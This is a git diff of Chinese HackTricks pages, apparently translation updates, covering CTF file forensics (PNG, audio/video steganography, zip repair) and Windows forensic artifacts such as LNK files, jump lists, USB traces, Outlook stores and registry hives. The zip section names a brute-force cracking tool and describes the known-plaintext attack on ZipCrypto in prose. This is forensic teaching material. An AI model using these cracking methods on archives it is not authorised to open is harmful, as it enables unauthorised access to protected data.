* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**PNG 文件** 在 **CTF 挑战** 中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像 **Wireshark** 这样的工具通过解剖网络数据包中的 PNG 文件数据,可以分析 PNG 文件,揭示嵌入的信息或异常。
|
||||
|
||||
为了检查 PNG 文件的完整性并修复损坏,**pngcheck** 是一个关键工具,提供命令行功能来验证和诊断 PNG 文件 ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像 [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) 这样的在线服务提供了一个基于 Web 的解决方案,用于**修复损坏的 PNG 文件**,帮助 CTF 参与者恢复关键数据。
|
||||
|
||||
这些策略强调了在 CTF 中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**音频和视频文件处理**是CTF取证挑战中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。
|
||||
**音频和视频文件处理**是**CTF取证挑战**中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。
|
||||
|
||||
对于音频挑战,**[Audacity](http://www.audacityteam.org/)**是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**强烈推荐用于详细的频谱图分析。**Audacity**允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**是一个命令行实用程序,擅长转换和编辑音频文件。
|
||||
|
||||
|
@ -20,22 +21,22 @@
|
|||
|
||||
视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)**是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**将FFmpeg的功能集成到Python中,实现高级可脚本化交互。
|
||||
|
||||
这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中的隐藏数据。
|
||||
这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中隐藏的数据。
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,46 @@
|
|||
# ZIP技巧
|
||||
# ZIPs 技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用工具:
|
||||
用于管理 **zip 文件** 的**命令行工具**对诊断、修复和破解 zip 文件至关重要。以下是一些关键的实用程序:
|
||||
|
||||
- **`unzip`**:显示zip文件无法解压缩的原因。
|
||||
- **`zipdetails -v`**:提供zip文件格式字段的详细分析。
|
||||
- **`zipinfo`**:列出zip文件的内容而不解压缩它们。
|
||||
- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的zip文件。
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长达约7个字符的密码有效。
|
||||
- **`unzip`**:显示 zip 文件无法解压缩的原因。
|
||||
- **`zipdetails -v`**:提供 zip 文件格式字段的详细分析。
|
||||
- **`zipinfo`**:列出 zip 文件的内容而不解压缩它们。
|
||||
- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的 zip 文件。
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**:一种用于暴力破解 zip 密码的工具,对长度约为 7 个字符的密码非常有效。
|
||||
|
||||
[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的详细信息。
|
||||
[Zip 文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于 zip 文件的结构和标准的全面详细信息。
|
||||
|
||||
值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解zip文件的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件不受这种明文攻击的影响,突显了为敏感数据选择安全加密方法的重要性。
|
||||
值得注意的是,受密码保护的 zip 文件**不会加密**其中的文件名或文件大小,这是与加密此信息的 RAR 或 7z 文件不同的安全漏洞。此外,使用旧的 ZipCrypto 方法加密的 zip 文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解 zip 的密码,这一漏洞在 [HackThis 的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) 中有详细说明,并在 [这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) 中进一步解释。然而,使用 **AES-256** 加密的 zip 文件对这种明文攻击免疫,突显了为敏感数据选择安全加密方法的重要性。
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -2,19 +2,20 @@
|
|||
|
||||
## Windows取证物
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -24,19 +25,19 @@
|
|||
|
||||
### Windows 10通知
|
||||
|
||||
在路径`\Users\<用户名>\AppData\Local\Microsoft\Windows\Notifications`中,您可以找到数据库`appdb.dat`(Windows周年更新前)或`wpndatabase.db`(Windows周年更新后)。
|
||||
在路径`\Users\<username>\AppData\Local\Microsoft\Windows\Notifications`中,您可以找到数据库`appdb.dat`(Windows周年纪念版之前)或`wpndatabase.db`(Windows周年纪念版之后)。
|
||||
|
||||
在这个SQLite数据库中,您可以找到包含有趣数据的所有通知(以XML格式)的`Notification`表。
|
||||
在这个SQLite数据库中,您可以找到包含所有通知(以XML格式)的`Notification`表,其中可能包含有趣的数据。
|
||||
|
||||
### 时间轴
|
||||
|
||||
时间轴是Windows的一个特性,提供了访问的网页、编辑的文档和执行的应用程序的**时间顺序历史记录**。
|
||||
|
||||
数据库位于路径`\Users\<用户名>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。可以使用SQLite工具或工具[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)打开此数据库,**该工具生成2个文件,可以使用工具**[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**。
|
||||
数据库位于路径`\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`。可以使用SQLite工具或工具[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)打开此数据库,**该工具生成2个文件,可以使用工具**[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**。
|
||||
|
||||
### ADS(备用数据流)
|
||||
|
||||
下载的文件可能包含**ADS Zone.Identifier**,指示它是如何从内部网络、互联网等下载的。一些软件(如浏览器)通常会放置**更多**的**信息**,如文件下载的**URL**。
|
||||
下载的文件可能包含**ADS Zone.Identifier**,指示它是如何从内部网络、互联网等下载的。一些软件(如浏览器)通常会放置**更多信息**,如文件下载的**URL**。
|
||||
|
||||
## **文件备份**
|
||||
|
||||
|
@ -60,7 +61,7 @@
|
|||
|
||||
阴影副本是包含在 Microsoft Windows 中的技术,可以在计算机文件或卷正在使用时创建**备份副本**或快照。
|
||||
|
||||
这些备份通常位于文件系统根目录下的 `\System Volume Information` 中,名称由以下图片中显示的**UIDs**组成:
|
||||
这些备份通常位于文件系统根目录下的 `\System Volume Information` 中,名称由以下图像中显示的**UIDs**组成:
|
||||
|
||||
![](<../../../.gitbook/assets/image (520).png>)
|
||||
|
||||
|
@ -89,9 +90,9 @@ Shell 项目是包含有关如何访问另一个文件的信息的项目。
|
|||
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
|
||||
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
|
||||
|
||||
创建文件夹时,还会创建指向文件夹、父文件夹和祖父文件夹的链接。
|
||||
创建文件夹时,还会创建到文件夹、父文件夹和祖父文件夹的链接。
|
||||
|
||||
这些自动创建的链接文件**包含有关源文件**是**文件**还是**文件夹**、该文件的**MAC时间**、文件存储位置的**卷信息**和**目标文件夹**的信息。这些信息可用于在文件被删除时恢复这些文件。
|
||||
这些自动创建的链接文件**包含有关源文件的信息**,例如它是**文件**还是**文件夹**,该文件的**MAC时间**,文件存储位置的**卷信息**和**目标文件夹**。这些信息可用于在文件被删除时恢复这些文件。
|
||||
|
||||
此外,链接文件的**创建日期**是原始文件**首次使用的时间**,链接文件的**修改日期**是原始文件**最后使用的时间**。
|
||||
|
||||
|
@ -100,17 +101,17 @@ Shell 项目是包含有关如何访问另一个文件的信息的项目。
|
|||
在此工具中,您将找到**2组**时间戳:
|
||||
|
||||
* **第一组:**
|
||||
1. FileModifiedDate
|
||||
2. FileAccessDate
|
||||
3. FileCreationDate
|
||||
1. 文件修改日期
|
||||
2. 文件访问日期
|
||||
3. 文件创建日期
|
||||
* **第二组:**
|
||||
1. LinkModifiedDate
|
||||
2. LinkAccessDate
|
||||
3. LinkCreationDate。
|
||||
1. 链接修改日期
|
||||
2. 链接访问日期
|
||||
3. 链接创建日期。
|
||||
|
||||
第一组时间戳引用**文件本身的时间戳**。第二组引用**链接文件的时间戳**。
|
||||
|
||||
您可以使用 Windows CLI 工具获取相同的信息:[**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
您可以使用 Windows CLI 工具获取相同信息:[**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
```
|
||||
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
||||
```
|
||||
|
@ -118,9 +119,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
这些是每个应用程序指示的最近文件。这是您可以在每个应用程序上访问的**最近使用的文件列表**。它们可以**自动创建或自定义**。
|
||||
|
||||
自动创建的**跳转列表**存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。跳转列表的命名遵循格式 `{id}.autmaticDestinations-ms`,其中初始ID是应用程序的ID。
|
||||
自动生成的**跳转列表**存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。跳转列表的命名遵循格式 `{id}.autmaticDestinations-ms`,其中初始ID是应用程序的ID。
|
||||
|
||||
自定义跳转列表存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,通常是由应用程序创建的,因为文件发生了**重要**事件(可能标记为收藏夹)。
|
||||
自定义跳转列表存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,它们通常是由应用程序创建的,因为文件发生了**重要**事件(可能标记为收藏夹)。
|
||||
|
||||
任何跳转列表的**创建时间**表示**文件首次访问的时间**,**修改时间表示最后一次访问的时间**。
|
||||
|
||||
|
@ -136,13 +137,13 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
## Windows USB的使用
|
||||
|
||||
通过以下内容的创建,可以确定是否使用了USB设备:
|
||||
通过以下内容的创建,可以确定已使用USB设备:
|
||||
|
||||
* Windows最近文件夹
|
||||
* Microsoft Office最近文件夹
|
||||
* 跳转列表
|
||||
|
||||
请注意,有些LNK文件指向WPDNSE文件夹而不是原始路径:
|
||||
请注意,某些LNK文件指向WPDNSE文件夹而不是原始路径:
|
||||
|
||||
![](<../../../.gitbook/assets/image (476).png>)
|
||||
|
||||
|
@ -156,17 +157,17 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
检查文件 `C:\Windows\inf\setupapi.dev.log` 可以获取有关USB连接产生的时间戳(搜索 `Section start`)。
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
[**USBDetective**](https://usbdetective.com) 可用于获取连接到图像的USB设备的信息。
|
||||
[**USBDetective**](https://usbdetective.com) 可用于获取已连接到图像的USB设备的信息。
|
||||
|
||||
![](<../../../.gitbook/assets/image (483).png>)
|
||||
|
||||
### 插拔清理
|
||||
|
||||
名为“插拔清理”的计划任务主要用于删除过时的驱动程序版本。与保留最新驱动程序包版本的指定目的相反,在线资源表明它还针对过去30天未活动的驱动程序。因此,过去30天未连接的可移动设备的驱动程序可能会被删除。
|
||||
名为“插拔清理”的计划任务主要用于删除过时的驱动程序版本。与保留最新驱动程序包版本的指定目的相反,在线资源表明它还针对在过去30天内未连接的驱动程序。因此,未连接在过去30天内的可移动设备的驱动程序可能会被删除。
|
||||
|
||||
该任务位于以下路径:
|
||||
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`。
|
||||
|
@ -181,9 +182,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
- **Period('P1M')**:指示任务计划程序在常规自动维护期间每月启动清理任务。
|
||||
- **Deadline('P2M')**:如果任务连续两个月失败,则指示任务计划程序在紧急自动维护期间执行任务。
|
||||
|
||||
此配置确保定期维护和清理驱动程序,并在连续失败的情况下重新尝试任务。
|
||||
此配置确保定期维护和清理驱动程序,并提供在连续失败的情况下重新尝试任务的规定。
|
||||
|
||||
**更多信息请查看:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
|
||||
**更多信息,请查看:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
|
||||
|
||||
## 电子邮件
|
||||
|
||||
|
@ -206,14 +207,14 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
### Microsoft Outlook
|
||||
|
||||
当使用Exchange服务器或Outlook客户端时,将会有一些MAPI标题:
|
||||
当使用Exchange服务器或Outlook客户端时,将会有一些MAPI头:
|
||||
|
||||
* `Mapi-Client-Submit-Time`:发送电子邮件时的系统时间
|
||||
* `Mapi-Conversation-Index`:线程的子消息数量和每个线程消息的时间戳
|
||||
* `Mapi-Client-Submit-Time`:发送电子邮件时系统的时间
|
||||
* `Mapi-Conversation-Index`:线程的子消息数量以及线程的每条消息的时间戳
|
||||
* `Mapi-Entry-ID`:消息标识符。
|
||||
* `Mappi-Message-Flags` 和 `Pr_last_Verb-Executed`:有关MAPI客户端的信息(消息已读?未读?已回复?已重定向?已设置为离开办公室?)
|
||||
* `Mappi-Message-Flags`和`Pr_last_Verb-Executed`:有关MAPI客户端的信息(消息已读?未读?已回复?已重定向?已设置为离开办公室?)
|
||||
|
||||
在Microsoft Outlook客户端中,所有已发送/接收的消息、联系人数据和日历数据都存储在PST文件中:
|
||||
在Microsoft Outlook客户端中,所有已发送/接收的消息、联系人数据和日历数据都存储在以下PST文件中:
|
||||
|
||||
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`(WinXP)
|
||||
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
|
||||
|
@ -225,7 +226,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
![](<../../../.gitbook/assets/image (485).png>)
|
||||
### Microsoft Outlook OST Files
|
||||
|
||||
**OST文件**是由Microsoft Outlook在配置了**IMAP**或**Exchange**服务器时生成的,存储类似于PST文件的信息。该文件与服务器同步,保留**最近12个月**的数据,最大大小为**50GB**,位于与PST文件相同的目录中。要查看OST文件,可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。
|
||||
**OST文件**是Microsoft Outlook在配置**IMAP**或**Exchange**服务器时生成的,存储类似于PST文件的信息。该文件与服务器同步,保留**最近12个月**的数据,最大大小为**50GB**,位于与PST文件相同的目录中。要查看OST文件,可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。
|
||||
|
||||
### 检索附件
|
||||
|
||||
|
@ -248,9 +249,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
Windows注册表存储广泛的系统和用户活动数据,包含在以下文件中:
|
||||
|
||||
- 对于各种`HKEY_LOCAL_MACHINE`子键,位于`%windir%\System32\Config`。
|
||||
- 对于`HKEY_CURRENT_USER`,位于`%UserProfile%{User}\NTUSER.DAT`。
|
||||
- Windows Vista及更高版本会在`%Windir%\System32\Config\RegBack\`中备份`HKEY_LOCAL_MACHINE`注册表文件。
|
||||
- 各种`HKEY_LOCAL_MACHINE`子键位于`%windir%\System32\Config`。
|
||||
- `HKEY_CURRENT_USER`位于`%UserProfile%{User}\NTUSER.DAT`。
|
||||
- Windows Vista及更高版本在`%Windir%\System32\Config\RegBack\`中备份`HKEY_LOCAL_MACHINE`注册表文件。
|
||||
- 此外,程序执行信息存储在从Windows Vista和Windows 2008 Server开始的`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`中。
|
||||
|
||||
### 工具
|
||||
|
@ -258,13 +259,13 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文
|
|||
一些工具可用于分析注册表文件:
|
||||
|
||||
* **注册表编辑器**:已安装在Windows中。它是一个GUI,可用于浏览当前会话的Windows注册表。
|
||||
* [**注册表浏览器**](https://ericzimmerman.github.io/#!index.md):允许加载注册表文件并通过GUI浏览它们。还包含突出显示具有有趣信息的键的书签。
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样,它有一个GUI,允许浏览加载的注册表,并包含突出显示加载的注册表中有趣信息的插件。
|
||||
* [**注册表浏览器**](https://ericzimmerman.github.io/#!index.md):允许加载注册表文件并通过GUI浏览。还包含突出显示具有有趣信息的键的书签。
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样具有GUI,可浏览加载的注册表,并包含突出显示加载的注册表中有趣信息的插件。
|
||||
